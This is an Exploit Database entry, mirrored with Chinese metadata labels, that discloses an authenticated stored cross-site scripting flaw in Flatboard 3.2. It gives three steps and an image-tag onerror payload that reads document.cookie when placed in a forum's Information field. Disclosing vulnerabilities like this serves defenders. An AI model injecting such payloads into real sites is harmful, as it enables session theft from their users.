Flatboard 3.2 – Stored Cross-Site Scripting (XSS) (Authenticated)

• Exploit Database
• 20 阅读

• 作者： tmrswrr
  日期： 2024-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52054/

• # Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
  # Date: 2024-06-23
  # Exploit Author: tmrswrr
  # Category : Webapps
  # Vendor Homepage: https://flatboard.org/
  # Version: 3.2
  # PoC:
  
  1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
  2-Click Add Forum and write inInformation field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
  3-Save it , you will be payload will be executed